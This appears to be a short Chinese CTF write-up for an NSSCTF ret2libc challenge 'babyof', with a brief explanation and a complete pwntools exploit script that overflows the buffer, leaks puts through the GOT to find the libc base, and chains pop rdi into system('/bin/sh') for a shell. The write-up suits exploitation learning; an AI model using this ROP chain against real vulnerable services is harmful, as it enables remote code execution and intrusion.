nssctf上这道题远端库和题目说明的库不是一个库,偏移量差0x10😡😡😡😡
首先checksec
此题程序ida反编译无system()或str_bin_sh
,而题目上写明ret2libc且告知系统版本,故考虑泄露libc基址进而求出system()或str_bin_sh
实际地址;
编写脚本向远端获取libc函数偏移量可得libc版本
故可以编写脚本如下(本地可打通,远端出锅(已解决
from pwn import *
from LibcSearcher import*
# context.log_level='debug'
# context.os='linux'
# context.arch='amd64'
# context.terminal=['tmux','splitw','-h']
# io=remote("1.14.71.254",28843)
io=process("./babyof")
elf=ELF("./babyof")
libc=ELF("./libc-2.27.so")
pop_rdi_addr=0x400743
ret_addr=0x400506
start_addr=0x40066b
puts_plt=elf.plt[b"puts"]
puts_got=elf.got[b"puts"]
payload1=cyclic(0x48)+p64(pop_rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(start_addr)
# gdb.attach(io)
# pause()
io.recvuntil(b"flow?")
io.sendline(payload1)
# puts_addr=u64(io.recv(6).ljust(8,b'\x00'))
# puts_addr=u64(io.recv(6).ljust(8, b'\x00'))
puts_addr=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base=puts_addr-libc.symbols[b"puts"]
sys_addr=libc_base+libc.symbols[b"system"]
bin_addr=libc_base+next(libc.search(b"/bin/sh"))
print("puts_plt: "+hex(puts_plt))
print("puts_got: "+hex(puts_got))
print("puts_addr: "+hex(puts_addr))
print("libc_base: "+hex(libc_base))
print("sys_addr: "+hex(sys_addr))
print("bin_offset: "+hex(next(libc.search(b"/bin/sh"))))
print("bin_addr: "+hex(bin_addr))
payload2=cyclic(0x48)+p64(pop_rdi_addr)+p64(bin_addr)+p64(sys_addr)
io.recvuntil(b"flow?")
io.sendline(payload2)
io.interactive()
